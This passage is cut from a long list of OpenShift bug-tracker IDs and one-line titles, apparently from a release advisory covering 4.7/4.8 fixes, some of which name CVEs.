dnsZone\n1919168 - `oc adm catalog mirror` doesn\u0027t work for the air-gapped cluster\n1919291 - [Cinder-csi-driver] Filesystem did not expand for on-line volume resize\n1919336 - vsphere-problem-detector should check if datastore is part of datastore cluster\n1919356 - Add missing profile annotation in cluster-update-keys manifests\n1919391 - CVE-2021-20206 containernetworking-cni: Arbitrary path injection via type field in CNI configuration\n1919398 - Permissive Egress NetworkPolicy (0.0.0.0/0) is blocking all traffic\n1919406 - OperatorHub filter heading \"Provider Type\" should be \"Source\"\n1919737 - hostname lookup delays when master node down\n1920209 - Multus daemonset upgrade takes the longest time in the cluster during an upgrade\n1920221 - GCP jobs exhaust zone listing query quota sometimes due to too many initializations of cloud provider in tests\n1920300 - cri-o does not support configuration of stream idle time\n1920307 - \"VM not running\" should be \"Guest agent required\" on vm details page in dev console\n1920532 - Problem in trying to connect through the service to a member that is the same as the caller. \n1920677 - Various missingKey errors in the devconsole namespace\n1920699 - Operation cannot be fulfilled on clusterresourcequotas.quota.openshift.io error when creating different OpenShift resources\n1920901 - [4.7]\"500 Internal Error\" for prometheus route in https_proxy cluster\n1920903 - oc adm top reporting unknown status for Windows node\n1920905 - Remove DNS lookup workaround from cluster-api-provider\n1921106 - A11y Violation: button name(s) on Utilization Card on Cluster Dashboard\n1921184 - kuryr-cni binds to wrong interface on machine with two interfaces\n1921227 - Fix issues related to consuming new extensions in Console static plugins\n1921264 - Bundle unpack jobs can hang indefinitely\n1921267 - ResourceListDropdown not internationalized\n1921321 - SR-IOV obliviously reboot the node\n1921335 - ThanosSidecarUnhealthy\n1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation\n1921720 - test: openshift-tests.[sig-cli] oc observe works as expected [Suite:openshift/conformance/parallel]\n1921763 - operator registry has high memory usage in 4.7... cleanup row closes\n1921778 - Push to stage now failing with semver issues on old releases\n1921780 - Search page not fully internationalized\n1921781 - DefaultList component not internationalized\n1921878 - [kuryr] Egress network policy with namespaceSelector in Kuryr behaves differently than in OVN-Kubernetes\n1921885 - Server-side Dry-run with Validation Downloads Entire OpenAPI spec often\n1921892 - MAO: controller runtime manager closes event recorder\n1921894 - Backport Avoid node disruption when kube-apiserver-to-kubelet-signer is rotated\n1921937 - During upgrade /etc/hostname becomes a directory, nodes are set with kubernetes.io/hostname=localhost label\n1921953 - ClusterServiceVersion property inference does not infer package and version\n1922063 - \"Virtual Machine\" should be \"Templates\" in template wizard\n1922065 - Rootdisk size is default to 15GiB in customize wizard\n1922235 - [build-watch] e2e-aws-upi - e2e-aws-upi container setup failing because of Python code version mismatch\n1922264 - Restore snapshot as a new PVC: RWO/RWX access modes are not click-able if parent PVC is deleted\n1922280 - [v2v] on the upstream release, In VM import wizard I see RHV but no oVirt\n1922646 - Panic in authentication-operator invoking webhook authorization\n1922648 - FailedCreatePodSandBox due to \"failed to pin namespaces [uts]: [pinns:e]: /var/run/utsns exists and is not a directory: File exists\"\n1922764 - authentication operator is degraded due to number of kube-apiservers\n1922992 - some button text on YAML sidebar are not translated\n1922997 - [Migration]The SDN migration rollback failed. \n1923038 - [OSP] Cloud Info is loaded twice\n1923157 - Ingress traffic performance drop due to NodePort services\n1923786 - RHV UPI fails with unhelpful message when ASSET_DIR is not set. \n1923811 - Registry claims Available=True despite .status.readyReplicas == 0  while .spec.replicas == 2\n1923847 - Error occurs when creating pods if configuring multiple key-only labels in default cluster-wide node selectors or project-wide node selectors\n1923984 - Incorrect anti-affinity for UWM prometheus\n1924020 - panic: runtime error: index out of range [0] with length 0\n1924075 - kuryr-controller restart when enablePortPoolsPrepopulation = true\n1924083 - \"Activity\" Pane of Persistent Storage tab shows events related to Noobaa too\n1924140 - [OSP] Typo in OPENSHFIT_INSTALL_SKIP_PREFLIGHT_VALIDATIONS variable\n1924171 - ovn-kube must handle single-stack to dual-stack migration\n1924358 - metal UPI setup fails, no worker nodes\n1924502 - Failed to start transient scope unit: Argument list too long / systemd[1]: Failed to set up mount unit: Invalid argument\n1924536 - \u0027More about Insights\u0027 link points to support link\n1924585 - \"Edit Annotation\" are not correctly translated in Chinese\n1924586 - Control Plane status and Operators status are not fully internationalized\n1924641 - [User Experience] The message \"Missing storage class\" needs to be displayed after user clicks Next and needs to be rephrased\n1924663 - Insights operator should collect related pod logs when operator is degraded\n1924701 - Cluster destroy fails when using byo with Kuryr\n1924728 - Difficult to identify deployment issue if the destination disk is too small\n1924729 - Create Storageclass for CephFS provisioner assumes incorrect default FSName in external mode (side-effect of fix for Bug 1878086)\n1924747 - InventoryItem doesn\u0027t internationalize resource kind\n1924788 - Not clear error message when there are no NADs available for the user\n1924816 - Misleading error messages in ironic-conductor log\n1924869 - selinux avc deny after installing OCP 4.7\n1924916 - PVC reported as Uploading when it is actually cloning\n1924917 - kuryr-controller in crash loop if IP is removed from secondary interfaces\n1924953 - newly added \u0027excessive etcd leader changes\u0027 test case failing in serial job\n1924968 - Monitoring list page filter options are not translated\n1924983 - some components in utils directory not localized\n1925017 - [UI] VM Details-\u003e Network Interfaces, \u0027Name,\u0027 is displayed instead on \u0027Name\u0027\n1925061 - Prometheus backed by a PVC may start consuming a lot of RAM after 4.6 -\u003e 4.7 upgrade due to series churn\n1925083 - Some texts are not marked for translation on idp creation page. \n1925087 - Add i18n support for the Secret page\n1925148 - Shouldn\u0027t create the redundant imagestream when use `oc new-app --name=testapp2 -i ` with exist imagestream\n1925207 - VM from custom template - cloudinit disk is not added if creating the VM from custom template using customization wizard\n1925216 - openshift installer fails immediately failed to fetch Install Config\n1925236 - OpenShift Route targets every port of a multi-port service\n1925245 - oc idle: Clusters upgrading with an idled workload do not have annotations on the workload\u0027s service\n1925261 - Items marked as mandatory in KMS Provider form are not enforced\n1925291 - Baremetal IPI - While deploying with IPv6 provision network with subnet other than /64 masters fail to PXE boot\n1925343 - [ci] e2e-metal tests are not using reserved instances\n1925493 - Enable snapshot e2e tests\n1925586 - cluster-etcd-operator is leaking transports\n1925614 - Error: InstallPlan.operators.coreos.com not found\n1925698 - On GCP, load balancers report kube-apiserver fails its /readyz check 50% of the time, causing load balancer backend churn and disruptions to apiservers\n1926029 - [RFE] Either disable save or give warning when no disks support snapshot\n1926054 - Localvolume CR is created successfully, when the storageclass name defined in the localvolume exists. \n1926072 - Close button (X) does not work in the new \"Storage cluster exists\" Warning alert message(introduced via fix for Bug 1867400)\n1926082 - Insights operator should not go degraded during upgrade\n1926106 - [ja_JP][zh_CN] Create Project, Delete Project and Delete PVC modal are not fully internationalized\n1926115 - Texts in \u201cInsights\u201d popover on overview page are not marked for i18n\n1926123 - Pseudo bug: revert \"force cert rotation every couple days for development\" in 4.7\n1926126 - some kebab/action menu translation issues\n1926131 - Add HPA page is not fully internationalized\n1926146 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should be able to connect to a service that is idled because a GET on the route will unidle it\n1926154 - Create new pool with arbiter - wrong replica\n1926278 - [oVirt] consume K8S 1.20 packages\n1926279 - Pod ignores mtu setting from sriovNetworkNodePolicies in case of PF partitioning\n1926285 - ignore pod not found status messages\n1926289 - Accessibility: Modal content hidden from screen readers\n1926310 - CannotRetrieveUpdates alerts on Critical severity\n1926329 - [Assisted-4.7][Staging] monitoring stack in staging is being overloaded by the amount of metrics being exposed by assisted-installer pods and scraped by prometheus. \n1926336 - Service details can overflow boxes at some screen widths\n1926346 - move to go 1.15 and registry.ci.openshift.org\n1926364 - Installer timeouts because proxy blocked connection to Ironic API running on bootstrap VM\n1926465 - bootstrap kube-apiserver does not have --advertise-address set \u2013 was: [BM][IPI][DualStack] Installation fails cause Kubernetes service doesn\u0027t have IPv6 endpoints\n1926484 - API server exits non-zero on 2 SIGTERM signals\n1926547 - OpenShift installer not reporting IAM permission issue when removing the Shared Subnet Tag\n1926579 - Setting .spec.policy is deprecated and will be removed eventually. Please use .spec.profile instead is being logged every 3 seconds in scheduler operator log\n1926598 - Duplicate alert rules are displayed on console for thanos-querier api return wrong results\n1926776 - \"Template support\" modal appears when select the RHEL6 common template\n1926835 - [e2e][automation] prow gating use unsupported CDI version\n1926843 - pipeline with finally tasks status is improper\n1926867 - openshift-apiserver Available is False with 3 pods not ready for a while during upgrade\n1926893 - When deploying the operator via OLM (after creating the respective catalogsource), the deployment \"lost\" the `resources` section. \n1926903 - NTO may fail to disable stalld when relying on Tuned \u0027[service]\u0027 plugin\n1926931 - Inconsistent ovs-flow rule on one of the app node for egress node\n1926943 - vsphere-problem-detector: Alerts in CI jobs\n1926977 - [sig-devex][Feature:ImageEcosystem][Slow] openshift sample application repositories rails/nodejs\n1927013 - Tables don\u0027t render properly at smaller screen widths\n1927017 - CCO does not relinquish leadership when restarting for proxy CA change\n1927042 - Empty static pod files on UPI deployments are confusing\n1927047 - multiple external gateway pods will not work in ingress with IP fragmentation\n1927068 - Workers fail to PXE boot when IPv6 provisionining network has subnet other than /64\n1927075 - [e2e][automation] Fix pvc string in pvc.view\n1927118 - OCP 4.7: NVIDIA GPU Operator DCGM metrics not displayed in OpenShift Console Monitoring Metrics page\n1927244 - UPI installation with Kuryr timing out on bootstrap stage\n1927263 - kubelet service takes around 43 secs to start container when started from stopped state\n1927264 - FailedCreatePodSandBox due to multus inability to reach apiserver\n1927310 - Performance: Console makes unnecessary requests for en-US messages on load\n1927340 - Race condition in OperatorCondition reconcilation\n1927366 - OVS configuration service unable to clone NetworkManager\u0027s connections in the overlay FS\n1927391 - Fix flake in TestSyncPodsDeletesWhenSourcesAreReady\n1927393 - 4.7 still points to 4.6 catalog images\n1927397 - p\u0026f: add auto update for priority \u0026 fairness bootstrap configuration objects\n1927423 - Happy \"Not Found\" and no visible error messages on error-list page when /silences 504s\n1927465 - Homepage dashboard content not internationalized\n1927678 - Reboot interface defaults to softPowerOff so fencing is too slow\n1927731 - /usr/lib/dracut/modules.d/30ignition/ignition --version sigsev\n1927797 - \u0027Pod(s)\u0027 should be included in the pod donut label when a horizontal pod autoscaler is enabled\n1927882 - Can\u0027t create cluster role binding from UI when a project is selected\n1927895 - global RuntimeConfig is overwritten with merge result\n1927898 - i18n Admin Notifier\n1927902 - i18n Cluster Utilization dashboard duration\n1927903 - \"CannotRetrieveUpdates\" - critical error in openshift web console\n1927925 - Manually misspelled as Manualy\n1927941 - StatusDescriptor detail item and Status component can cause runtime error when the status is an object or array\n1927942 - etcd should use socket option (SO_REUSEADDR) instead of wait for port release on process restart\n1927944 - cluster version operator cycles terminating state waiting for leader election\n1927993 - Documentation Links in OKD Web Console are not Working\n1928008 - Incorrect behavior when we click back button after viewing the node details in Internal-attached mode\n1928045 - N+1 scaling Info message says \"single zone\" even if the nodes are spread across 2 or 0 zones\n1928147 - Domain search set in the required domains in Option 119 of DHCP Server is ignored by RHCOS on RHV\n1928157 - 4.7 CNO claims to be done upgrading before it even starts\n1928164 - Traffic to outside the cluster redirected when OVN is used and NodePort service is configured\n1928297 - HAProxy fails with 500 on some requests\n1928473 - NetworkManager overlay FS not being created on None platform\n1928512 - sap license management logs gatherer\n1928537 - Cannot IPI with tang/tpm disk encryption\n1928640 - Definite error message when using StorageClass based on azure-file / Premium_LRS\n1928658 - Update plugins and Jenkins version to prepare openshift-sync-plugin 1.0.46 release\n1928850 - Unable to pull images due to limited quota on Docker Hub\n1928851 - manually creating NetNamespaces will break things and this is not obvious\n1928867 - golden images - DV should not be created with WaitForFirstConsumer\n1928869 - Remove css required to fix search bug in console caused by pf issue in 2021.1\n1928875 - Update translations\n1928893 - Memory Pressure Drop Down Info is stating \"Disk\" capacity is low instead of memory\n1928931 - DNSRecord CRD is using deprecated v1beta1 API\n1928937 - CVE-2021-23337 nodejs-lodash: command injection via template\n1928954 - CVE-2020-28500 nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions\n1929052 - Add new Jenkins agent maven dir for 3.6\n1929056 - kube-apiserver-availability.rules are failing evaluation\n1929110 - LoadBalancer service check test fails during vsphere upgrade\n1929136 - openshift isn\u0027t able to mount nfs manila shares to pods\n1929175 - LocalVolumeSet: PV is created on disk belonging to other provisioner\n1929243 - Namespace column missing in Nodes Node Details / pods tab\n1929277 - Monitoring workloads using too high a priorityclass\n1929281 - Update Tech Preview badge to transparent border color when upgrading to PatternFly v4.87.1\n1929314 - ovn-kubernetes endpoint slice controller doesn\u0027t run on CI jobs\n1929359 - etcd-quorum-guard uses origin-cli [4.8]\n1929577 - Edit Application action overwrites Deployment envFrom values on save\n1929654 - Registry for Azure uses legacy V1 StorageAccount\n1929693 - Pod stuck at \"ContainerCreating\" status\n1929733 - oVirt CSI driver operator is constantly restarting\n1929769 - Getting 404 after switching user perspective in another tab and reload Project details\n1929803 - Pipelines shown in edit flow for Workloads created via ContainerImage flow\n1929824 - fix alerting on volume name check for vsphere\n1929917 - Bare-metal operator is firing for ClusterOperatorDown for 15m during 4.6 to 4.7 upgrade\n1929944 - The etcdInsufficientMembers alert fires incorrectly when any instance is down and not when quorum is lost\n1930007 - filter dropdown item filter and resource list dropdown item filter doesn\u0027t support multi selection\n1930015 - OS list is overlapped by buttons in template wizard\n1930064 - Web console crashes during VM creation from template when no storage classes are defined\n1930220 - Cinder CSI driver is not able to mount volumes under heavier load\n1930240 - Generated clouds.yaml incomplete when provisioning network is disabled\n1930248 - After creating a remediation flow and rebooting a worker there is no access to the openshift-web-console\n1930268 - intel vfio devices are not expose as resources\n1930356 - Darwin binary missing from mirror.openshift.com\n1930393 - Gather info about unhealthy SAP pods\n1930546 - Monitoring-dashboard-workload keep loading when user with cluster-role cluster-monitoring-view login develoer console\n1930570 - Jenkins templates are displayed in Developer Catalog twice\n1930620 - the logLevel field in containerruntimeconfig can\u0027t be set to \"trace\"\n1930631 - Image local-storage-mustgather in the doc does not come from product registry\n1930893 - Backport upstream patch 98956 for pod terminations\n1931005 - Related objects page doesn\u0027t show the object when its name is empty\n1931103 - remove periodic log within kubelet\n1931115 - Azure cluster install fails with worker type workers Standard_D4_v2\n1931215 - [RFE] Cluster-api-provider-ovirt should handle affinity groups\n1931217 - [RFE] Installer should create RHV Affinity group for OCP cluster VMS\n1931467 - Kubelet consuming a large amount of CPU and memory and node becoming unhealthy\n1931505 - [IPI baremetal] Two nodes hold the VIP post remove and start  of the Keepalived container\n1931522 - Fresh UPI install on BM with bonding using OVN Kubernetes fails\n1931529 - SNO: mentioning of 4 nodes in error message - Cluster network CIDR prefix 24 does not contain enough addresses for 4 hosts each one with 25 prefix (128 addresses)\n1931629 - Conversational Hub Fails due to ImagePullBackOff\n1931637 - Kubeturbo Operator fails due to ImagePullBackOff\n1931652 - [single-node] etcd: discover-etcd-initial-cluster graceful termination race. \n1931658 - [single-node] cluster-etcd-operator: cluster never pivots from bootstrapIP endpoint\n1931674 - [Kuryr] Enforce nodes MTU for the Namespaces and Pods\n1931852 - Ignition HTTP GET is failing, because DHCP IPv4 config is failing silently\n1931883 - Fail to install Volume Expander Operator due to CrashLookBackOff\n1931949 - Red Hat  Integration Camel-K Operator keeps stuck in Pending state\n1931974 - Operators cannot access kubeapi endpoint on OVNKubernetes on ipv6\n1931997 - network-check-target causes upgrade to fail from 4.6.18 to 4.7\n1932001 - Only one of multiple subscriptions to the same package is honored\n1932097 - Apiserver liveness probe is marking it as unhealthy during normal shutdown\n1932105 - machine-config ClusterOperator claims level while control-plane still updating\n1932133 - AWS EBS CSI Driver doesn\u2019t support \u201ccsi.storage.k8s.io/fsTyps\u201d parameter\n1932135 - When \u201ciopsPerGB\u201d parameter is not set, event for AWS EBS CSI Driver provisioning is not clear\n1932152 - When \u201ciopsPerGB\u201d parameter is set to a wrong number, events for AWS EBS CSI Driver provisioning are not clear\n1932154 - [AWS ] machine stuck in provisioned phase , no warnings or errors\n1932182 - catalog operator causing CPU spikes and bad etcd performance\n1932229 - Can\u2019t find kubelet metrics for aws ebs csi volumes\n1932281 - [Assisted-4.7][UI] Unable to change upgrade channel once upgrades were discovered\n1932323 - CVE-2021-26540 sanitize-html: improper validation of hostnames set by the \"allowedIframeHostnames\" option can lead to bypass hostname whitelist for iframe element\n1932324 - CRIO fails to create a Pod in sandbox stage -  starting container process caused: process_linux.go:472: container init caused: Running hook #0:: error running hook: exit status 255, stdout: , stderr: \\\"\\n\"\n1932362 - CVE-2021-26539 sanitize-html: improper handling of internationalized domain name (IDN) can lead to bypass hostname whitelist validation\n1932401 - Cluster Ingress Operator degrades if external LB redirects http to https because of new \"canary\" route\n1932453 - Update Japanese timestamp format\n1932472 - Edit Form/YAML switchers cause weird collapsing/code-folding issue\n1932487 - [OKD] origin-branding manifest is missing cluster profile annotations\n1932502 - Setting MTU for a bond interface using Kernel arguments is not working\n1932618 - Alerts during a test run should fail the test job, but were not\n1932624 - ClusterMonitoringOperatorReconciliationErrors is pending at the end of an upgrade and probably should not be\n1932626 - During a 4.8 GCP upgrade OLM fires an alert indicating the operator is unhealthy\n1932673 - Virtual machine template provided by red hat should not be editable. The UI allows to edit and then reverse the change after it was made\n1932789 - Proxy with port is unable to be validated if it overlaps with service/cluster network\n1932799 - During a hive driven baremetal installation the process does not go beyond 80% in the bootstrap VM\n1932805 - e2e: test OAuth API connections in the tests by that name\n1932816 - No new local storage operator bundle image is built\n1932834 - enforce the use of hashed access/authorize tokens\n1933101 - Can not upgrade a Helm Chart that uses a library chart in the OpenShift dev console\n1933102 - Canary daemonset uses default node selector\n1933114 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should be able to connect to a service that is idled because a GET on the route will unidle it [Suite:openshift/conformance/parallel/minimal]\n1933159 - multus DaemonSets should use maxUnavailable: 33%\n1933173 - openshift-sdn/sdn DaemonSet should use maxUnavailable: 10%\n1933174 - openshift-sdn/ovs DaemonSet should use maxUnavailable: 10%\n1933179 - network-check-target DaemonSet should use maxUnavailable: 10%\n1933180 - openshift-image-registry/node-ca DaemonSet should use maxUnavailable: 10%\n1933184 - openshift-cluster-csi-drivers DaemonSets should use maxUnavailable: 10%\n1933263 - user manifest with nodeport services causes bootstrap to block\n1933269 - Cluster unstable replacing an unhealthy etcd member\n1933284 - Samples in CRD creation are ordered arbitarly\n1933414 - Machines are created with unexpected name for Ports\n1933599 - bump k8s.io/apiserver to 1.20.3\n1933630 - [Local Volume] Provision disk failed when disk label has unsupported value like \":\"\n1933664 - Getting Forbidden for image in a container template when creating a sample app\n1933708 - Grafana is not displaying deployment config resources in dashboard `Default /Kubernetes / Compute Resources / Namespace (Workloads)`\n1933711 - EgressDNS: Keep short lived records at most 30s\n1933730 - [AI-UI-Wizard] Toggling \"Use extra disks for local storage\" checkbox highlights the \"Next\" button to move forward but grays out once clicked\n1933761 - Cluster DNS service caps TTLs too low and thus evicts from its cache too aggressively\n1933772 - MCD Crash Loop Backoff\n1933805 - TargetDown alert fires during upgrades because of normal upgrade behavior\n1933857 - Details page can throw an uncaught exception if kindObj prop is undefined\n1933880 - Kuryr-Controller crashes when it\u0027s missing the status object\n1934021 - High RAM usage on machine api termination node system oom\n1934071 - etcd consuming high amount of  memory and CPU after upgrade to 4.6.17\n1934080 - Both old and new Clusterlogging CSVs stuck in Pending during upgrade\n1934085 - Scheduling conformance tests failing in a single node cluster\n1934107 - cluster-authentication-operator builds URL incorrectly for IPv6\n1934112 - Add memory and uptime metadata to IO archive\n1934113 - mcd panic when there\u0027s not enough free disk space\n1934123 - [OSP] First public endpoint is used to fetch ignition config from Glance URL (with multiple endpoints) on OSP\n1934163 - Thanos Querier restarting and gettin alert ThanosQueryHttpRequestQueryRangeErrorRateHigh\n1934174 - rootfs too small when enabling NBDE\n1934176 - Machine Config Operator degrades during cluster update with failed to convert Ignition config spec v2 to v3\n1934177 - knative-camel-operator  CreateContainerError \"container_linux.go:366: starting container process caused: chdir to cwd (\\\"/home/nonroot\\\") set in config.json failed: permission denied\"\n1934216 - machineset-controller stuck in CrashLoopBackOff after upgrade to 4.7.0\n1934229 - List page text filter has input lag\n1934397 - Extend OLM operator gatherer to include Operator/ClusterServiceVersion conditions\n1934400 - [ocp_4][4.6][apiserver-auth] OAuth API servers are not ready - PreconditionNotReady\n1934516 - Setup different priority classes for prometheus-k8s and prometheus-user-workload pods\n1934556 - OCP-Metal images\n1934557 - RHCOS boot image bump for LUKS fixes\n1934643 - Need BFD failover capability on ECMP routes\n1934711 - openshift-ovn-kubernetes ovnkube-node DaemonSet should use maxUnavailable: 10%\n1934773 - Canary client should perform canary probes explicitly over HTTPS (rather than redirect from HTTP)\n1934905 - CoreDNS\u0027s \"errors\" plugin is not enabled for custom upstream resolvers\n1935058 - Can\u2019t finish install sts clusters on aws government region\n1935102 - Error: specifying a root certificates file with the insecure flag is not allowed during oc login\n1935155 - IGMP/MLD packets being dropped\n1935157 - [e2e][automation] environment tests broken\n1935165 - OCP 4.6 Build fails when filename contains an umlaut\n1935176 - Missing an indication whether the deployed setup is SNO. \n1935269 - Topology operator group shows child Jobs. Not shown in details view\u0027s resources. \n1935419 - Failed to scale worker using virtualmedia on Dell R640\n1935528 - [AWS][Proxy] ingress reports degrade with CanaryChecksSucceeding=False in the cluster with proxy setting\n1935539 - Openshift-apiserver CO unavailable during cluster upgrade from 4.6 to 4.7\n1935541 - console operator panics in DefaultDeployment with nil cm\n1935582 - prometheus liveness probes cause issues while replaying WAL\n1935604 - high CPU usage fails ingress controller\n1935667 - pipelinerun status icon rendering issue\n1935706 - test: Detect when the master pool is still updating after upgrade\n1935732 - Update Jenkins agent maven directory to be version agnostic [ART ocp build data]\n1935814 - Pod and Node lists eventually have incorrect row heights when additional columns have long text\n1935909 - New CSV using ServiceAccount named \"default\" stuck in Pending during upgrade\n1936022 - DNS operator performs spurious updates in response to API\u0027s defaulting of daemonset\u0027s terminationGracePeriod and service\u0027s clusterIPs\n1936030 - Ingress operator performs spurious updates in response to API\u0027s defaulting of NodePort service\u0027s clusterIPs field\n1936223 - The IPI installer has a typo. It is missing the word \"the\" in \"the Engine\". \n1936336 - Updating multus-cni builder \u0026 base images to be consistent with ART 4.8 (closed)\n1936342 - kuryr-controller restarting after 3 days cluster running - pools without members\n1936443 - Hive based OCP IPI baremetal installation fails to connect to API VIP port 22623\n1936488 - [sig-instrumentation][Late] Alerts shouldn\u0027t report any alerts in firing state apart from Watchdog and AlertmanagerReceiversNotConfigured: Prometheus query error\n1936515 - sdn-controller is missing some health checks\n1936534 - When creating a worker with a used mac-address stuck on registering\n1936585 - configure alerts if the catalogsources are missing\n1936620 - OLM checkbox descriptor renders switch instead of checkbox\n1936721 - network-metrics-deamon not associated with a priorityClassName\n1936771 - [aws ebs csi driver] The event for Pod consuming a readonly PVC is not clear\n1936785 - Configmap gatherer doesn\u0027t include namespace name (in the archive path) in case of a configmap with binary data\n1936788 - RBD RWX PVC creation with  Filesystem volume mode selection is creating RWX PVC with Block volume mode instead of disabling Filesystem volume mode selection\n1936798 - Authentication log gatherer shouldn\u0027t scan all the pod logs in the openshift-authentication namespace\n1936801 - Support ServiceBinding 0.5.0+\n1936854 - Incorrect imagestream is shown as selected in knative service container image edit flow\n1936857 - e2e-ovirt-ipi-install-install is permafailing on 4.5 nightlies\n1936859 - ovirt 4.4 -\u003e 4.5 upgrade jobs are permafailing\n1936867 - Periodic vsphere IPI install is broken - missing pip\n1936871 - [Cinder CSI] Topology aware provisioning doesn\u0027t work when Nova and Cinder AZs are different\n1936904 - Wrong output YAML when syncing groups without --confirm\n1936983 - Topology view - vm details screen isntt stop loading\n1937005 - when kuryr quotas are unlimited, we should not sent alerts\n1937018 - FilterToolbar component does not handle \u0027null\u0027 value for \u0027rowFilters\u0027 prop\n1937020 - Release new from image stream chooses incorrect ID based on status\n1937077 - Blank White page on Topology\n1937102 - Pod Containers Page Not Translated\n1937122 - CAPBM changes to support flexible reboot modes\n1937145 - [Local storage] PV provisioned by localvolumeset stays in \"Released\" status after the pod/pvc deleted\n1937167 - [sig-arch] Managed cluster should have no crashlooping pods in core namespaces over four minutes\n1937244 - [Local Storage] The model name of aws EBS doesn\u0027t be extracted well\n1937299 - pod.spec.volumes.awsElasticBlockStore.partition is not respected on NVMe volumes\n1937452 - cluster-network-operator CI linting fails in master branch\n1937459 - Wrong Subnet retrieved for Service without Selector\n1937460 - [CI] Network quota pre-flight checks are failing the installation\n1937464 - openstack cloud credentials are not getting configured with correct user_domain_name across the cluster\n1937466 - KubeClientCertificateExpiration alert is confusing, without explanation in the documentation\n1937496 - Metrics viewer in OCP Console is missing date in a timestamp for selected datapoint\n1937535 - Not all image pulls within OpenShift builds retry\n1937594 - multiple pods in ContainerCreating state after migration from OpenshiftSDN to OVNKubernetes\n1937627 - Bump DEFAULT_DOC_URL for 4.8\n1937628 - Bump upgrade channels for 4.8\n1937658 - Description for storage class encryption during storagecluster creation needs to be updated\n1937666 - Mouseover on headline\n1937683 - Wrong icon classification of output in buildConfig when the destination is a DockerImage\n1937693 - ironic image \"/\" cluttered with files\n1937694 - [oVirt] split ovirt providerIDReconciler logic into NodeController and ProviderIDController\n1937717 - If browser default font size is 20, the layout of template screen breaks\n1937722 - OCP 4.8 vuln due to BZ 1936445\n1937929 - Operand page shows a 404:Not Found error for OpenShift GitOps Operator\n1937941 - [RFE]fix wording for favorite templates\n1937972 - Router HAProxy config file template is slow to render due to repetitive regex compilations\n1938131 - [AWS] Missing iam:ListAttachedRolePolicies permission in permissions.go\n1938321 - Cannot view PackageManifest objects in YAML on \u0027Home \u003e Search\u0027 page nor \u0027CatalogSource details \u003e Operators tab\u0027\n1938465 - thanos-querier should set a CPU request on the thanos-query container\n1938466 - packageserver deployment sets neither CPU or memory request on the packageserver container\n1938467 - The default cluster-autoscaler should get default cpu and memory requests if user omits them\n1938468 - kube-scheduler-operator has a container without a CPU request\n1938492 - Marketplace extract container does not request CPU or memory\n1938493 - machine-api-operator declares restrictive cpu and memory limits where it should not\n1938636 - Can\u0027t set the loglevel of the container: cluster-policy-controller and kube-controller-manager-recovery-controller\n1938903 - Time range on dashboard page will be empty after drog and drop mouse in the graph\n1938920 - ovnkube-master/ovs-node DaemonSets should use maxUnavailable: 10%\n1938947 - Update blocked from 4.6 to 4.7 when using spot/preemptible instances\n1938949 - [VPA] Updater failed to trigger evictions due to \"vpa-admission-controller\" not found\n1939054 - machine healthcheck kills aws spot instance before generated\n1939060 - CNO: nodes and masters are upgrading simultaneously\n1939069 - Add source to vm template silently failed when no storage class is defined in the cluster\n1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string\n1939168 - Builds failing for OCP 3.11 since PR#25 was merged\n1939226 - kube-apiserver readiness probe appears to be hitting /healthz, not /readyz\n1939227 - kube-apiserver liveness probe appears to be hitting /healthz, not /livez\n1939232 - CI tests using openshift/hello-world broken by Ruby Version Update\n1939270 - fix co upgradeableFalse status and reason\n1939294 - OLM may not delete pods with grace period zero (force delete)\n1939412 - missed labels for thanos-ruler pods\n1939485 - CVE-2021-20291 containers/storage: DoS via malicious image\n1939547 - Include container=\"POD\" in resource queries\n1939555 - VSphereProblemDetectorControllerDegraded: context canceled during upgrade to 4.8.0\n1939573 - after entering valid git repo url on add flow page, throwing warning message instead Validated\n1939580 - Authentication operator is degraded during 4.8 to 4.8 upgrade and normal 4.8 e2e runs\n1939606 - Attempting to put a host into maintenance mode warns about Ceph cluster health, but no storage cluster problems are apparent\n1939661 - support new AWS region ap-northeast-3\n1939726 - clusteroperator/network should not change condition/Degraded during normal serial test execution\n1939731 - Image registry operator reports unavailable during normal serial run\n1939734 - Node Fanout Causes Excessive WATCH Secret Calls, Taking Down Clusters\n1939740 - dual stack nodes with OVN single ipv6 fails on bootstrap phase\n1939752 - ovnkube-master sbdb container does not set requests on cpu or memory\n1939753 - Delete HCO is stucking if there is still VM in the cluster\n1939815 - Change the Warning Alert for Encrypted PVs in Create StorageClass(provisioner:RBD) page\n1939853 - [DOC] Creating manifests API should not allow folder in the \"file_name\"\n1939865 - GCP PD CSI driver does not have CSIDriver instance\n1939869 - [e2e][automation] Add annotations to datavolume for HPP\n1939873 - Unlimited number of characters accepted for base domain name\n1939943 - `cluster-kube-apiserver-operator check-endpoints` observed a panic: runtime error: invalid memory address or nil pointer dereference\n1940030 - cluster-resource-override: fix spelling mistake for run-level match expression in webhook configuration\n1940057 - Openshift builds should use a wach instead of polling when checking for pod status\n1940142 - 4.6-\u003e4.7 updates stick on OpenStackCinderCSIDriverOperatorCR_OpenStackCinderDriverControllerServiceController_Deploying\n1940159 - [OSP] cluster destruction fails to remove router in BYON (with provider network) with Kuryr as primary network\n1940206 - Selector and VolumeTableRows not i18ned\n1940207 - 4.7-\u003e4.6 rollbacks stuck on prometheusrules admission webhook \"no route to host\"\n1940314 - Failed to get type for Dashboard Kubernetes / Compute Resources / Namespace (Workloads)\n1940318 - No data under \u0027Current Bandwidth\u0027 for Dashboard \u0027Kubernetes / Networking / Pod\u0027\n1940322 - Split of dashbard  is wrong, many Network parts\n1940337 - rhos-ipi installer fails with not clear message when openstack tenant doesn\u0027t have flavors needed for compute machines\n1940361 - [e2e][automation] Fix vm action tests with storageclass HPP\n1940432 - Gather datahubs.installers.datahub.sap.com resources from SAP clusters\n1940488 - After fix for CVE-2021-3344, Builds do not mount node entitlement keys\n1940498 - pods may fail to add logical port due to lr-nat-del/lr-nat-add error messages\n1940499 - hybrid-overlay not logging properly before exiting due to an error\n1940518 - Components in bare metal components lack resource requests\n1940613 - CVE-2021-27292 nodejs-ua-parser-js: ReDoS via malicious User-Agent header\n1940704 - prjquota is dropped from rootflags if rootfs is reprovisioned\n1940755 - [Web-console][Local Storage] LocalVolumeSet could not be created from web-console without detail error info\n1940865 - Add BareMetalPlatformType into e2e upgrade service unsupported list\n1940876 - Components in ovirt components lack resource requests\n1940889 - Installation failures in OpenStack release jobs\n1940933 - [sig-arch] Check if alerts are firing during or after upgrade success: AggregatedAPIDown 